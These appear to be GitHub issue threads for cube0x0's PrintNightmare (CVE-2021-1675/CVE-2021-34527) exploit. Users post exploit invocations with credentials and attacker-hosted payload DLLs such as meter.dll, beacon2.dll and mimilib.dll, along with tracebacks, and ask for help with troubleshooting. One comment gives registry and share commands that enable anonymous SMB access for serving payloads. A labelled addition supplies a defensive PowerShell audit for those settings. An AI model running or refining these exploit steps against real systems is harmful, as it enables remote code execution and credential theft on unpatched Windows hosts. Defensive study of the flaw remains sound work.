cube0x0 / cve-2021-1675
C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527
$ python .\CVE-2021-1675.py ignite.local/techuser:[email protected] "\\10.10.10.155\share\meter.dll"
[*] Try 1...
[*] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[*] Executing \\10.10.10.155\share\meter.dll
[*] Stage0: 0
[*] Try 2...
[*] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[*] Executing \\10.10.10.155\share\meter.dll
[*] Stage0: 0
[*] Try 3...
[*] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[*] Executing \\10.10.10.155\share\meter.dll
[*] Stage0: 0
DLL doesn't get executed
Traceback (most recent call last):
File "/home/kali/github/CVE-2021-1675/CVE-2021-1675.py", line 117, in
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
File "/home/kali/github/CVE-2021-1675/CVE-2021-1675.py", line 53, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
Running remotely against a Windows 10 host.
Running the exploit successfully drops the malicious DLL in C:\Windows\System32\spool\drivers\x64\3. However, the "backup" process in the exploit write-up does not appear to be happening. C:\Windows\System32\spool\drivers\x64\3\old never appears to exist, resulting in RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified. errors when trying to execute the DLL.
I have tried changing the pConfigFile to point at the .dll that I know exists:
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename)
But this results in what I believe is expected from the original writeup:
RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process.
For the remote exploits, do you still need the same SMB configuration as you would with the Python script (either samba or the silly Windows share config)?
I have my share configured as mentioned in the python script readme, and I have tried running the remote as current context and remote runas against the DC using the path mentioned in the help menu and was getting Windows error code 1801. I also tried it against a generic share (not configured for null session, but Anonymous and Everyone have Read Access) and got the same 1801 error.
I switched the file to the one on the DC which has a slightly different path (amd64_7b3eed059f4c3e41) and was still getting windows error code 1801 on all attempts.
(same results in remote and runas)
[*] Try 1...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
[*] Executing '\\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801
[*] Try 2...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
[*] Executing '\\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801
[*] Try 3...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
[*] Executing '\\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801
[*] Try 1...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801
[*] Try 2...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801
Hello,
After investigating about this exploit, I've seen that the vulnerability CVE-2021-1675 was fully patched with the June 2021 security update. If this exploit is still working it is because it is exploiting the CVE-2021-34527. Can you confirm it, please?
Sources:
https://nakedsecurity.sophos.com/2021/07/07/printnightmare-official-patch-is-out-update-now/
https://nakedsecurity.sophos.com/2021/07/16/more-printnightmare-we-told-you-not-to-turn-the-print-spooler-back-on/
https://www.tenable.com/blog/cve-2021-34527-microsoft-releases-out-of-band-patch-for-printnightmare-vulnerability-in-windows
I want to create an anonymous SMB server on Windows which is in a domain, but it needs domain administrator authentication.
If I create an anonymous SMB server outside the domain, I can't access the SMB directory from my domain controller server.
So how do I create an SMB service that allows anonymous access without requiring domain administrator authentication?
This is the full error:
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x45a - ERROR_DLL_INIT_FAILED - A dynamic link library (DLL) initialization routine failed.
I am trying this exploit on Windows 10. There is no DC. Can anyone help?
└─# python3 CVE-2021-1675.py domain.com/sird:[email protected] \\192.168.189.131\smb\shell.dll
[*] Connecting to ncacn_np:192.168.189.128[\PIPE\spoolss]
[-] Connection Failed
Does anyone know how to fix this issue? I was not able to connect to my Windows Server 2019.
The C# exp error:
Unhandled Exception: System.IO.FileNotFoundException: Could not load file or assembly 'System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' or one of its dependencies. The system cannot find the path specified.
at SharpPrintNightmare.Program.getDrivers(String computername)
at SharpPrintNightmare.Program.Main(String[] args)
Target Framework is set to 4.0
It seems to be working on member servers and workstations only when UAC is off (RPC access denied on RpcAddPrinterDriverEx).
Works as-is on a DC.
Any info about that?
Maybe something with rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000?
What problem did I have, as described below, when I ran the exploit?
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/tmp/CVE-2021-1675.py", line 176, in <module>
main(dce, pDriverPath, options.share)
File "/tmp/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request
answer = self.recv()
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv
response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv
return self.__smb_connection.readFile(self.__tid, self.__handle)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile
bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx
return self.read(tid, fid, offset, max_size, wait_answer)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1310, in read
ans = self.recvSMB(packetID)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 454, in recvSMB
data = self._NetBIOSSession.recv_packet(self._timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 914, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 1001, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 985, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
Hope to get help from seniors. Thank you. <3 <3 <3
sudo python3 CVE-2021-1675.py test.local/chen:[email protected] '\\192.168.121.128\smb\reverse.dll'
[*] Connecting to ncacn_np:192.168.121.165[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.121.128\smb\reverse.dll
[*] Try 1...
Traceback (most recent call last):
File "/home/kali/CVE-2021-1675.py", line 188, in
main(dce, pDriverPath, options.share)
File "/home/kali/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.
Start SMB server with Impacket:
sudo examples/smbserver.py -smb2support -ts smb /xxx/PrintNightmare/smb
Run exploit:
python CVE-2021-1675.py -port 445 'xxx/xxx:xxx/@xxx' '\\10.33.69.214\smb\nightmare.dll' 'C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL'
Exploit log:
[*] Connecting to ncacn_np:xxx[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL
[*] Executing \\10.33.69.214\smb\nightmare.dll
[*] Try 1...
Traceback (most recent call last):
File "xxx/CVE-2021-1675-cube0x0/CVE-2021-1675.py", line 176, in <module>
main(dce, pDriverPath, options.share)
File "xxx/CVE-2021-1675-cube0x0/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "xxx/CVE-2021-1675-cube0x0/venv/lib/python3.9/site-packages/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "xxx/CVE-2021-1675-cube0x0/venv/lib/python3.9/site-packages/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process.
SMB log:
[2021-07-05 12:31:44] [*] Disconnecting Share(1:smb)
[2021-07-05 12:31:44] [*] Closing down connection (10.33.48.25,58737)
[2021-07-05 12:31:44] [*] Remaining connections []
[2021-07-05 12:31:48] [*] Incoming connection (10.33.48.25,57754)
[2021-07-05 12:31:48] [*] AUTHENTICATE_MESSAGE (\,xxx)
[2021-07-05 12:31:48] [*] User xxx\ authenticated successfully
[2021-07-05 12:31:48] [*] :::00::aaaaaaaaaaaaaaaa
[2021-07-05 12:31:49] [*] Connecting Share(1:smb)
Unimplemented dissector: SPOOLSS
Return code: Share mode on file conflict with open mode (0x00000020)
Is anyone familiar with this error?
Receiving this error when executing the script. The DLL is getting uploaded and is in the driver list; it exists at the file path "C:\Windows\System32\spool\drivers\x64\3\MyDll.dll".
Output:
[*] Connecting to ncacn_np:10.1.1.6[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \\10.1.1.5\smb\MyDll.dll
[*] Stage0: 0
RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.
Server is Windows Server 2019 Essentials.
sudo python3 CVE-2021-1675.py test.local/chen:[email protected] '\\192.168.121.128\smb\reverse.dll'
[*] Connecting to ncacn_np:192.168.121.136[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_ce3301b66255a0fb\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.121.128\smb\reverse.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile
bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx
return self.read(tid, fid, offset, max_size, wait_answer)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1312, in read
if ans.isValidAnswer(STATUS_SUCCESS):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been closed.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/kali/CVE-2021-1675.py", line 192, in
main(dce, pDriverPath, options.share)
File "/home/kali/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request
answer = self.recv()
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv
response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv
return self.__smb_connection.readFile(self.__tid, self.__handle)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 603, in readFile
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_BROKEN(The pipe operation has failed because the other end of the pipe has been closed.)
Getting an error
Traceback (most recent call last):
File "./rpcdump.py", line 23, in
from impacket.http import AUTH_NTLM
ImportError: No module named impacket.http
Followed install instructions exactly (kali). Google wasn't any help.
Hi,
I started SMB sharing as anonymous with SMBv2 support. Any user can access the SMB share and it works correctly in the DLL but I keep getting the following error. Do you have any advice?
[*] Try 1...
[*] Connecting to ncacn_np:192.168.237.131[\PIPE\spoolss]
[+] Bind OK
[*] Uploading \\192.168.237.130\share\a.dll
Traceback (most recent call last):
File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 117, in <module>
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 53, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x57 - ERROR_INVALID_PARAMETER - The parameter is incorrect.
Hi
I ran this:
SharpPrintNightmare.exe '\\DESKTOP-BVJA\Users\F1\Desktop\share\rev.dll' '\\192.168.100.135' pr.local user 123@qwe
and the result is:
[-] Failed to enumerate printer drivers
Connecting to ncacn_np:*****[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\***\share\reverse.dll
[*] Try 1...
Traceback (most recent call last):
File "/home/kali/share/CVE-2021-1675-main/./CVE-2021-1675.py", line 188, in
main(dce, pDriverPath, options.share)
File "/home/kali/share/CVE-2021-1675-main/./CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: unknown error code: 0x180
Hi,
I am trying to use the RCE version of the exploit on an unpatched test environment with no success. The LPE attack works.
This is the result:
python3 CVE-2021-1675.py 'LAB/attacker:Password@victim_IP' '\\file_server_IP\nightmare\nightmare.dll'
[*] Connecting to ncacn_np:192.168.0.200[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.0.102\nightmare\nightmare.dll
[*] Try 1...
Traceback (most recent call last):
File "CVE-2021-1675.py", line 188, in <module>
main(dce, pDriverPath, options.share)
File "CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.6/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.6.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.6/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.6.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
Any help is appreciated.
mkdir C:\share
icacls C:\share\ /T /grant Anonymous` logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
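A defender-side check for the configuration in the comment above, added here as an example and not part of cube0x0's repository: it reads back the same LanManServer and Lsa registry values, lists non-administrative shares whose ACL grants access to ANONYMOUS LOGON or Everyone, and reports the Print Spooler service state. The function name Test-AnonymousSmbExposure and the shape of its output object are my own choices.

```powershell
# Added audit example (not part of the cube0x0/CVE-2021-1675 repository).
# Reads the LanManServer and Lsa values that the commands above set and reports
# whether this host currently exposes an anonymous (null session) SMB share,
# which is the share configuration the Python exploit's share argument relies on.

$LanManParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters'
$LsaKey       = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Get-RegistryValueOrDefault {
    param([string]$Path, [string]$Name, $Default)
    # A missing value and a missing key both fall back to the caller's default.
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $Default }
    return $item.$Name
}

function Test-AnonymousSmbExposure {
    $findings = New-Object System.Collections.Generic.List[string]

    # REG_MULTI_SZ values come back as string arrays; @() keeps .Count valid when absent.
    $nullShares   = @(Get-RegistryValueOrDefault $LanManParams 'NullSessionShares' @())
    $nullPipes    = @(Get-RegistryValueOrDefault $LanManParams 'NullSessionPipes'  @())
    $everyoneAnon = [int](Get-RegistryValueOrDefault $LsaKey 'EveryoneIncludesAnonymous' 0)
    $restrictAnon = [int](Get-RegistryValueOrDefault $LsaKey 'RestrictAnonymous' 0)

    if ($nullShares.Count -gt 0) {
        $findings.Add("NullSessionShares permits null-session access to: $($nullShares -join ', ')")
    }
    if ($nullPipes.Count -gt 0) {
        $findings.Add("NullSessionPipes permits null-session access to: $($nullPipes -join ', ')")
    }
    if ($everyoneAnon -eq 1) {
        $findings.Add('EveryoneIncludesAnonymous=1: anonymous logons receive Everyone ACEs')
    }
    if ($restrictAnon -eq 0 -and ($nullShares.Count -gt 0 -or $everyoneAnon -eq 1)) {
        $findings.Add('RestrictAnonymous=0 while null-session access is configured')
    }

    # Share ACLs: the commands above grant ReadAccess to 'ANONYMOUS LOGON' and 'Everyone'.
    $anonPrincipals = 'ANONYMOUS LOGON', 'Everyone'
    foreach ($share in Get-SmbShare | Where-Object { -not $_.Special }) {
        foreach ($ace in Get-SmbShareAccess -Name $share.Name) {
            $account = ($ace.AccountName -split '\\')[-1]   # drop the 'NT AUTHORITY\' prefix
            if ($ace.AccessControlType -eq 'Allow' -and $anonPrincipals -contains $account) {
                $findings.Add("Share '$($share.Name)' ($($share.Path)) allows $($ace.AccessRight) to $($ace.AccountName)")
            }
        }
    }

    # The spooler is the service that loads the driver DLL; stopped/disabled means no listener.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $spoolerState = if ($null -eq $spooler) { 'not installed' }
                    else { "$($spooler.Status) (StartType $($spooler.StartType))" }

    [pscustomobject]@{
        NullSessionShares         = $nullShares
        NullSessionPipes          = $nullPipes
        EveryoneIncludesAnonymous = $everyoneAnon
        RestrictAnonymous         = $restrictAnon
        PrintSpooler              = $spoolerState
        Findings                  = $findings.ToArray()
        Exposed                   = ($findings.Count -gt 0)
    }
}

# Run from an elevated PowerShell prompt on the host being checked.
Test-AnonymousSmbExposure | Format-List
```

On a host where the commands above were applied, Findings lists the NullSessionShares entry, the EveryoneIncludesAnonymous flag and the share ACE for ANONYMOUS LOGON; reverting those settings (or removing the share) empties it.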
This is not working on Windows 10. Can you help me with this?
┌──(king㉿Kali)-[~/CVE-2021-1675]
└─$ sudo python3 CVE-2021-1675.py genyu.com/wxh:[email protected] '\\192.168.175.132\smb\rever.dll'
[*] Connecting to ncacn_np:192.168.175.133[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.175.132\smb\rever.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 568, in writeFile
return self._SMBConnection.writeFile(treeId, fileId, data, offset)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1650, in writeFile
written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1358, in write
if ans.isValidAnswer(STATUS_SUCCESS):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/king/CVE-2021-1675/CVE-2021-1675.py", line 190, in
main(dce, pDriverPath, options.share)
File "/home/king/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 856, in request
self.call(request.opnum, request, uuid)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 845, in call
return self.send(DCERPC_RawCall(function, body.getData(), uuid))
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1298, in send
self._transport_send(data)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1235, in _transport_send
self._transport.send(rpc_packet.get_packet(), forceWriteAndx = forceWriteAndx, forceRecv = forceRecv)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 535, in send
self.__smb_connection.writeFile(self.__tid, self.__handle, data)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 570, in writeFile
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)
PLEASE HELP ME!!!!
C:\Users\test\Desktop>SharpPrintNightmare.exe '\\100.100.100.102\share\mimilib.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL' '\\100.100.100.100'
[*] Try 1...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\\100.100.100.102\share\mimilib.dll'
[*] Stage 0: 1801
[*] Try 2...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\\100.100.100.102\share\mimilib.dll'
[*] Stage 0: 1801
[*] Try 3...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\\100.100.100.102\share\mimilib.dll'
[*] Stage 0: 1801
Doesn't seem to work; Wireshark also did not catch the traffic.
I did it in a virtualized environment using the PoC you provided. However, it always ends with "Stage0: 0". Am I missing any step? When using Process Monitor I see my DLL has been included, but nothing happens. Thank you very much.
I probably can use the ports 139 and 445. I can only use the ones above 1024; it works with port 56970 for creating the SMB server but not for the exploit: CVE-2021-1675.py: error: argument -port: invalid choice: '56970' (choose from '139', '445')
What can I do?
sudo python3 CVE-2021-1675.py TEST/administrator:[email protected] '\\192.168.121.128\smb\reverse.dll' 'C:\Windows\System32\spool\drivers\x64\3\UNIDRV.DLL'
[*] Connecting to ncacn_np:192.168.121.164[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\spool\drivers\x64\3\UNIDRV.DLL
[*] Executing \\192.168.121.128\smb\reverse.dll
[*] Try 1...
Traceback (most recent call last):
File "/home/kali/CVE-2021-1675.py", line 176, in
main(dce, pDriverPath, options.share)
File "/home/kali/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
